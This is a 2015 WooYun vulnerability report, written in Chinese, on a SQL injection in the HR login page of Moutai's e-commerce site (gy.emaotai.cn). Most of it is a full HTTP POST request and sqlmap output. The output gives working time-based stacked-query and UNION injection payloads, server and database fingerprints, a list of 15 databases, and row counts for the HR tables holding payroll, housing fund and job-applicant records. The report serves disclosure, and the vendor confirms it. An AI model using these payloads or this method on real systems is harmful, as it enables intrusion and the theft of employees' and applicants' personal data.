当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162325

漏洞标题:茅台电商某系统存在SQL注入漏洞(涉及众多信息)

相关厂商:emaotai.cn

漏洞作者: 路人甲

提交时间:2015-12-18 10:46

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-18: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

详细说明:

POST /HR/LoginTo.aspx HTTP/1.1
Content-Length: 2583
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCABDADDD=AMELIIPAGPFFMEGBLJGGOACJ; ASPSESSIONIDACADDADC=CBPLBNOAKCCIJBGGOMLMHMIN; ASP.NET_SessionId=b4fo3etcwb4xfls0stxndg2a
Host: gy.emaotai.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
btnlogin=&cbxOrgs=e&cbxOrgs%24DDD%24L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42%2c1_74%2c2_22%2c2_29%2c2_21%2c1_67%2c1_64%2c2_24%2c1_41%2c2_15&tbxPassword=g00dPa%24%24w0rD&UsersPanel%24cbxUsers=e&UsersPanel%24cbxUsers%24DDD%24L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM%2bskZ93r%2bLE0i79YMR0%2b6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm%2bi1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho%2bahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs%2bWKqOe6quW%2bi%2bebkeWvn%2bWupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L%2bd566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD%2beUn%2ba0u%2bacjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu%2bmAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L%2bh5oGv5Lit5b%2bDHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y%2bR5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW%2bkOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee%2bih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw%3d%3d&__VIEWSTATEGENERATOR=CAB2EC08


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: UsersPanel_cbxUsers_VI (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1';WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(74)+CHAR(70)+CHAR(88)+CHAR(99)+CHAR(77)+CHAR(83)+CHAR(78)+CHAR(69)+CHAR(73)+CHAR(76)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)-- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [15]:
[*] DrpECO
[*] EA
[*] gy
[*] HR
[*] HRTest
[*] master
[*] model
[*] moutaiBak
[*] moutaiDev
[*] moutaiTest
[*] msdb
[*] QRTest
[*] rsda
[*] tempdb
[*] test

一共是15个库,当前库为HR:

Database: HR
+------------------------------------------------+---------+
| Table                                          | Entries |
+------------------------------------------------+---------+
| dbo.t_gz_ffb                                   | 1690142 |
| dbo.v_gzb_view                                 | 1690142 |
| dbo.t_gjj_ffb                                  | 1602979 |
| dbo.v_gjj                                      | 1602979 |
| dbo.t_zlbt_ffb                                 | 1159908 |
| dbo.v_zlbt                                     | 1159908 |
| dbo.t_nj_month                                 | 677127  |
| dbo.t_sys_logs                                 | 415324  |
| dbo.t_nj_ygtz                                  | 342025  |
| dbo.v_nj_ygtz                                  | 342025  |
| dbo.v_qynj                                     | 342025  |
| dbo.t_gz_year                                  | 202209  |
| dbo.t_nj_year                                  | 118666  |
| dbo.v_da_ddjlb                                 | 80073   |
| dbo.t_da_jt                                    | 67327   |
| dbo.t_rygl_rygzgxb                             | 55518   |
| dbo.t_da_jl                                    | 53607   |
| dbo.t_kq_hzb                                   | 45436   |
| dbo.t_kq_kq                                    | 36151   |
| dbo.v_kq_kq_cn                                 | 36151   |
| dbo.v_kq_kq_cn                                 | 36151   |
| dbo.t_sys_queue                                | 34627   |
| dbo.tmp_sb_ndbb                                | 32684   |
| dbo.t_gz_sw                                    | 31389   |
| dbo.tmp_sb_yearydhj                            | 23987   |
| dbo.t_sbgl_ygsbhz                              | 23888   |
| dbo.t_da_index                                 | 21799   |
| dbo.v_da_index                                 | 21799   |
| dbo.v_gz_da1                                   | 21799   |
| dbo.v_gz_da_cn                                 | 21799   |
| dbo.v_gz_da_cn                                 | 21799   |
| dbo.v_gz_da_cn                                 | 21799   |
| dbo.v_nj_da_import                             | 21799   |
| dbo.v_rs_da_cn                                 | 21799   |
| dbo.v_rs_da_cn                                 | 21799   |
| dbo.v_ry_fromGz                                | 21799   |
| dbo.v_sp_da                                    | 21799   |
| dbo.t_gz_kjbz                                  | 21739   |
| dbo.v_gz_kjbz                                  | 21739   |
| dbo.t_zp_img                                   | 21690   |
| dbo.v_nj_da_cn                                 | 20532   |
| dbo.v_nj_da_cn                                 | 20532   |
| dbo.v_nj_rylb                                  | 20532   |
| dbo.t_ht_index                                 | 20178   |
| dbo.v_da_ht_cn                                 | 20178   |
| dbo.v_da_ht_cn                                 | 20178   |
| dbo.v_ht_index                                 | 20178   |
| dbo.v_ryda                                     | 20134   |
| dbo.t_da_img                                   | 19479   |
| dbo.t_da_ht_201301_bak                         | 15978   |
| dbo.t_da_ht_201301_bak                         | 15978   |
| dbo.t_zlbt_year_per                            | 14800   |
| dbo.tmp_t_gz_da                                | 14575   |
| dbo.t_gz_da_yf                                 | 14276   |
| dbo.t_gz_da_cache                              | 14139   |
| dbo.gz201110                                   | 12410   |
| dbo.gz201109                                   | 12281   |
| dbo.t_da_ddjlb_999912                          | 12281   |
| dbo.t_da_ddjlb_999912                          | 12281   |
| dbo.t_xtgl_jsqx                                | 12197   |
| dbo.t_da_ht_bak                                | 12027   |
| dbo.v_da_rsdab                                 | 11961   |
| dbo.t_da_zc                                    | 11175   |
| dbo.v_da_zc                                    | 11175   |
| dbo.tmp_rsda_wh                                | 10111   |
| dbo.t_rygl_gdkk                                | 9691    |
| dbo.t_nj_ffb                                   | 9157    |
| dbo.t_sp_spbgmx_list                           | 9130    |
| dbo.t_sp_spbgmx_list                           | 9130    |
| dbo.t_sp_spbgmx_list                           | 9130    |
| dbo.v_sp_spbgmx_list                           | 9130    |
| dbo.v_sp_spbgmx_list                           | 9130    |
| dbo.v_sp_spbgmx_list                           | 9130    |
| dbo.t_nj_jcjlb                                 | 8684    |
| dbo.v_da_old_bwh                               | 8194    |
| dbo.yhzh2                                      | 7916    |
| dbo.yhzh2                                      | 7916    |
| dbo.tmp_ndgz_tot                               | 7544    |
| dbo.t_da_zctz                                  | 7509    |
| dbo.v_da_zctz                                  | 7509    |
| dbo.t_zp_da                                    | 6960    |
| dbo.zlbt                                       | 6872    |
| dbo.t_rpt_ryddjl                               | 5860    |
| dbo.t_sys_Columdef                             | 5532    |
| dbo.t_rygl_csrq                                | 5102    |
| dbo.tmp_gzda_bwh                               | 3964    |
| dbo.t_hr_log                                   | 2856    |
| dbo.tmp_dqht1                                  | 2674    |
| dbo.tmp_dqht2                                  | 2657    |
| dbo.t_gz_da_2                                  | 2648    |
| dbo.tmp_sb_kq                                  | 2324    |
| dbo.t_da_rsdab_1                               | 1797    |
| dbo.t_da_rsdab_1                               | 1797    |
| dbo.tmp_kq_2013                                | 1788    |
| dbo.tmp_sbnj                                   | 1678    |
| dbo.t_xtgl_dwbmb                               | 1671    |
| dbo.t_xtgl_dwzzjgb                             | 1268    |
| dbo.v_xtgl_dwzzjgb                             | 1248    |
| dbo.t_zlbt_year_dpt                            | 1196    |
| dbo.t_cx_sql                                   | 988     |
| dbo.t_sp_dwdl                                  | 986     |
| dbo.t_xtgl_czryjs                              | 978     |
| dbo.t_xtgl_czryjs                              | 978     |
| dbo.tmp_yhjj_Import                            | 884     |
| dbo.t_gz_hzb                                   | 815     |
| dbo.t_sys_fielddef                             | 795     |
| dbo.t_sp_tzjl                                  | 777     |
| dbo.t_xtgl_jsgsb                               | 751     |
| dbo.t_da_jc                                    | 684     |
| dbo.t_rygl_rydab_tx                            | 675     |
| dbo.tmp_gxbd_101                               | 673     |
| dbo.tmp_gxbd_101                               | 673     |
| dbo.tmp_gxbd_101                               | 673     |
| dbo.tmp_gxbd_102                               | 673     |
| dbo.t_gz_ffbt                                  | 593     |
| dbo.v_gzbt                                     | 593     |
| dbo.t_sp_spjl                                  | 542     |
| dbo.t_sp_cljl                                  | 508     |
| dbo.tmp_rybh                                   | 506     |
| dbo.t_xtgl_dm                                  | 501     |
| dbo.tmpYxtx                                    | 470     |
| dbo.t_gjj_ffbt                                 | 411     |
| dbo.v_xtgl_dm                                  | 410     |
| dbo.t_zlbt_da_tmp                              | 403     |
| dbo.t_zlbt_da_tmp                              | 403     |
| dbo.tmp_dabh                                   | 340     |
| dbo.t_zlbt_ffbt                                | 336     |
| dbo.t_zlbt_hzb                                 | 313     |
| dbo.t_sys_tabledef                             | 310     |
| dbo.t_da_xs                                    | 306     |
| dbo.cj1201                                     | 253     |
| dbo.tmpfzf1                                    | 211     |
| dbo.tmpgftx                                    | 209     |
| dbo.t_sys_StoreProc                            | 197     |
| dbo.t_da_bdjl                                  | 159     |
| dbo.tmp_njgl_2013txry                          | 157     |
| dbo.tmp_sb_tx                                  | 153     |
| dbo.t_sys_project                              | 152     |
| dbo.SolarData                                  | 150     |
| dbo.t_gz_da_bhw                                | 149     |
| dbo.t_xtgl_rjmkbmb                             | 142     |
| dbo.t_sys_code                                 | 141     |
| dbo.t_da_rsdab_tmp                             | 130     |
| dbo.t_gjj_hzb                                  | 122     |
| dbo.njkk2012                                   | 120     |
| dbo.t_nj_da_tmp                                | 100     |
| dbo.t_nj_da_tmp                                | 100     |
| dbo.t_px_tzpx                                  | 100     |
| dbo.v_px_tzpx                                  | 100     |
| dbo.t_xtgl_czjsb                               | 97      |
| dbo.t_gz_da_tmp                                | 94      |
| dbo.t_bank_import_gjj                          | 92      |
| dbo.t_bank_import_gjj                          | 92      |
| dbo.t_zlbt_log                                 | 85      |
| dbo.tmp_gxbd201304                             | 73      |
| dbo.tmp_da_rsdab                               | 54      |
| dbo.tmp_nj_2013                                | 53      |
| dbo.tmp_rsda_bwh_end                           | 53      |
| dbo.tmp_rsda_bwh_end                           | 53      |
| dbo.tmpgflt                                    | 48      |
| dbo.t_zp_jh                                    | 36      |
| dbo.t_gz_da_12100002注销人员                           | 32      |
| dbo.t_sys_haliday                              | 29      |
| dbo.t_cx_Rpt                                   | 27      |
| dbo.t_gz_da_12100001注销人员                           | 26      |
| dbo.t_gz_da_12100001注销人员                           | 26      |
| dbo.t_gz_da_12100001注销人员                           | 26      |
| dbo.t_cx_backup                                | 23      |
| dbo.t_nj_yfze                                  | 20      |
| dbo.t_xtgl_csb                                 | 18      |
| dbo.t_px_course                                | 17      |
| dbo.t_nj_yhllb                                 | 16      |
| dbo.dtproperties                               | 14      |
| dbo.tm_nj_ygtz_1月征收                               | 14      |
| dbo.tmpyxlt                                    | 14      |
| dbo.t_sys_subject_dm                           | 13      |
| dbo.t_sys_subject_dm                           | 13      |
| dbo.t_xtgl_sydyb                               | 12      |
| dbo.t_xtgl_config                              | 10      |
| dbo.t_nj_ndze                                  | 9       |
| dbo.t_help_book                                | 6       |
| dbo.tmp_cwgs                                   | 6       |
| dbo.lst_dwTree_Nodes                           | 4       |
| dbo.t_xtgl_bgdyb                               | 4       |
| dbo.t_kq_grhz                                  | 3       |
| dbo.t_kq_jqts                                  | 3       |
| dbo.t_sys_totparams                            | 3       |
| dbo.v_kq_jqts                                  | 3       |
| dbo.sysdiagrams                                | 2       |
| dbo.t_kq_qxj                                   | 2       |
| dbo.t_px_org                                   | 2       |
| dbo.t_xtgl_yhcp                                | 2       |
| dbo.v_kq_qxj                                   | 2       |
| dbo.AspNet_SqlCacheTablesForChangeNotification | 1       |
| dbo.t_px_plan                                  | 1       |
| dbo.t_sys_requirement                          | 1       |
| dbo.t_zp_gg                                    | 1       |
| dbo.v_nj_ffbg                                  | 1       |
| dbo.v_nj_ffbg                                  | 1       |
+------------------------------------------------+---------+


众多信息泄露,由于表名命令没啥规律,所以翻看了几个表:

漏洞证明:

v_zlbt表,百万信息量:

1.png

应该是打款信息:

2.png


t_zp_da,求职者信息:

3.jpg

5.png


HR库,一共200多个表,信息量肯定很多,就不一一去翻看了!

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-18 11:42

厂商回复:

感谢您的反馈,我们将尽快修复。

最新状态:

暂无